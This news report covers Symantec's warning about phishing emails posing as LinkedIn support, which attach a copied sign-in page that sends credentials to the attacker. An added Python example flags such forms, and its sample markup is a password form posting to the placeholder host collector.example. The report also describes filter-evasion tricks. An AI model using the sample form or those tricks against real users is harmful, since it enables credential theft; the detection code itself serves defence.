Cyber criminals are now targeting LinkedIn users with emails that claim to come from the support team of the world’s largest professional networking firm and trick recipients into sharing their credentials, security software firm Symantec warned today.
Founded in 2003, LinkedIn has over 300 million members globally, of which more than 26 million users are in India (as of June 2014). Symantec said that over the last week it has observed an increase in phishing emails claiming to be from the US-based firm’s support team.
No immediate response was available from LinkedIn. “The body of the email claims that irregular activities have prompted a ‘compulsory security update’ for the recipients’ LinkedIn account,” Symantec said. The email goes on to say that in order to secure their account, the recipient needs to download the attached form (an HTML attachment) and follow the instructions, it added.
The attachment is a copy of the real LinkedIn.com website, it said. “However, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker,” Symantec warned. The email uses a lowercase ‘i’ to spell LinkedIn, instead of capital ‘I’ as used by the firm. “The difference in characters is indiscernible to the eye and functions as a way to evade mail filters. Also, the HTML attachment method bypasses browser blacklists that often flag suspicious websites to help prevent users from being phished,” Symantec said.
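A mail gateway or analyst can check an attachment like the one described above without opening it in a browser. The Python below is an added example, not code from Symantec or LinkedIn: it flags password forms in an HTML file that post to a host outside linkedin.com. The trusted-domain list, the function names and the sample markup with the placeholder host collector.example are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: domains a genuine LinkedIn sign-in form may post to.
TRUSTED_SUFFIXES = ("linkedin.com",)

class CredentialFormScanner(HTMLParser):
    """Records the action URL of each <form> that holds a password input."""
    def __init__(self):
        super().__init__()
        self.in_form = self.has_password = False
        self.action = ""
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.in_form, self.has_password = True, False
            self.action = (attrs.get("action") or "").strip()
        elif tag == "input" and self.in_form:
            if (attrs.get("type") or "").lower() == "password":
                self.has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            if self.has_password:
                self.password_form_actions.append(self.action)
            self.in_form = False

def is_trusted(host):
    # Exact match or true subdomain; "linkedin.com.evil.example" does not pass.
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)

def suspicious_form_targets(html):
    """Return untrusted hosts that a password form in `html` would post to."""
    scanner = CredentialFormScanner()
    scanner.feed(html)
    scanner.close()
    scanner.handle_endtag("form")  # flush a form left unclosed
    hosts = [urlparse(a).hostname for a in scanner.password_form_actions]
    return [h for h in hosts if h and not is_trusted(h)]

# Constructed sample attachment; collector.example is a placeholder host.
SAMPLE = """<form method="post" action="https://collector.example/save.php">
<input type="text" name="email"><input type="password" name="password">
</form>"""

if __name__ == "__main__":
    print(suspicious_form_targets(SAMPLE))
```

A form with a relative action is not reported, because a page opened from a local attachment has no remote origin for that action to resolve against.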
The security firm said LinkedIn users should consider turning on two-step verification, as this would prevent an attacker from accessing the account even if a user’s credentials are compromised.